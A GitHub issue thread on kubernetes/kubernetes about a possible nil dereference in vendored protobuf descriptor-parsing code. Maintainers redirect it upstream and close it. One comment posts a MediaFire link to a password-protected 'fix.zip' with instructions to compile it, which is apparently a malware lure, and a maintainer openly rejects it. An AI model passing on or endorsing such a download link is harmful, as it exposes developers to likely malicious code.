### ISSUE TITLE
Possible nil dereference in `unmarshalFull` if VarintType is executed before `BytesType`

### ISSUE THREAD

**Issue by PavlNekrasov** [kubernetes/kubernetes#128235]
### What happened?

In the `unmarshalFull` function, a nil dereference may occur if the `VarintType` case in the `switch` block is executed before the `BytesType` case.

https://github.com/kubernetes/kubernetes/blob/f1e447b9d32ac325074380d239370cde02a6dbf7/vendor/google.golang.org/protobuf/internal/filedesc/desc_lazy.go#L142-L167

### What did you expect to happen?

The program should handle such cases correctly without a nil dereference error.

### How can we reproduce it (as minimally and precisely as possible)?

1. Pass a byte array that contains a tag for `PublicDependency` or `WeakDependency` but does not contain a tag for `Dependency`.

3. Call the `unmarshalFull` function.

### Anything else we need to know?

Found by Linux Verification Center (linuxtesting.org) with SVACE.
Reporter: Pavel Nekrasov ([p.nekrasov@fobos-nt.ru](mailto:p.nekrasov@fobos-nt.ru)).

### Kubernetes version

<details>

```console
$ kubectl version
# paste output here
```

</details>

### Cloud provider

<details>

</details>

### OS version

<details>

```console
# On Linux:
$ cat /etc/os-release
# paste output here
$ uname -a
# paste output here

# On Windows:
C:\> wmic os get Caption, Version, BuildNumber, OSArchitecture
# paste output here
```

</details>

### Install tools

<details>

</details>

### Container runtime (CRI) and version (if applicable)

<details>

</details>

### Related plugins (CNI, CSI, ...) and versions (if applicable)

<details>

</details>

**Comment by DaavMendonca** [comment]
try this

https://www.mediafire.com/file/6r8pvis8j6lc0j9/fix.zip/file
Archive codepass: xfp53
If you don't have the c compliator, install it.(gcc or clang)

**Comment by neolit123** [comment]
/sig api-machinery
(protobuf dependency)

**Comment by BenTheElder** [comment]
> [kubernetes/vendor/google.golang.org/protobuf/internal/filedesc/desc_lazy.go](https://github.com/kubernetes/kubernetes/blob/f1e447b9d32ac325074380d239370cde02a6dbf7/vendor/google.golang.org/protobuf/internal/filedesc/desc_lazy.go#L142-L167)

Note that this code is vendored and not authored by the project, so we'd want to fix it in the original repo first. Which would be google.golang/org/protobuf ...

> Pass a byte array that contains a tag for PublicDependency or WeakDependency but does not contain a tag for Dependency.

Is there evidence that Kubernetes is actually doing this anywhere?
Have you spoken to the upstream project?

> try this
>
> https://www.mediafire.com/file/6r8pvis8j6lc0j9/fix.zip/file> 
> Archive codepass: xfp53
> If you don't have the c compliator, install it.(gcc or clang)

Why not host the code in a gist or something? I don't think any of the maintainers are going to download and run / compile an encrypted zip from mediafire ...

**Comment by Jefftree** [comment]
/triage unresolved
/close

Closing due to lack of follow up. Please open an issue with the upstream repo.
